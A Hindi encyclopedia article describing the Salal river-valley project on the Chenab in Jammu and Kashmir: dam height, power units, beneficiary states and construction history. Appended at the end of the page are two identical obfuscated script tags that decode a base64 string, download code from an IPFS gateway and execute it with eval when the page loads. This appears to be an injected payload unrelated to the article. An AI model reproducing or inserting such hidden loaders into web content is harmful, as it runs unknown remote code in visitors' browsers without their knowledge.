सलाल परियोजना

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

सलाल परियोजना भारत की नदी घाटी परियोजना है। इस परियोजना की शुरुआत जम्मू-कश्मीर राज्य में चिनाब नदी पर सिंचाई एवं जल विद्युत के लिए सन 1961 में की गई थी।

  • इस परियोजना के अंतर्गत एक 118 मीटर उँचे, रॉकफिल, सलाल बाँध का निर्माण जम्मू-कश्मीर के उधमपुर ज़िले में किया गया था।
  • परियोजना के प्रथम चरण में 115 मेगावाट की 3 विद्युत इकाइयाँ लगाई गयी थीं। दूसरे चरण में 113X3 मेगावाट की तीन और इकाइयाँ लगाई गयी हैं।
  • जम्मू-कश्मीर, पंजाब, हरियाणा, दिल्ली, हिमाचल प्रदेश, चंडीगढ़ और राजस्थान इस परियोजना से लाभांवित होने वाले राज्य हैं।[1]
  • इस परियोजना की परिकल्पना वर्ष 1920 में की गई थी। परियोजना पर जाँच वर्ष 1961 में जम्मू एवं कश्मीर सरकार द्वारा प्रारम्भ की गई और निर्माण 1970 में 'सिंचाई एवं विद्युत मंत्रालय', भारत सरकार के अधीन 'केन्द्रीय जल विद्युत परियोजना नियंत्रण बोर्ड' द्वारा प्रारम्भ किया गया था।
  • वर्ष 1978 में परियोजना के निर्माण का कार्य एनएचपीसी को एजेंसी आधार पर सौंपा गया था।
  • परियोजना पूर्ण होने के पश्‍चात इसे प्रचालन तथा अनुरक्षण हेतु स्वामित्व आधार पर एनएचपीसी को सौंपा गया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. भारत में बहुउद्देशीय परियोजनाएँ (हिन्दी) वाइवेस पेनोरमा। अभिगमन तिथि: 16 नवम्बर, 2014।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>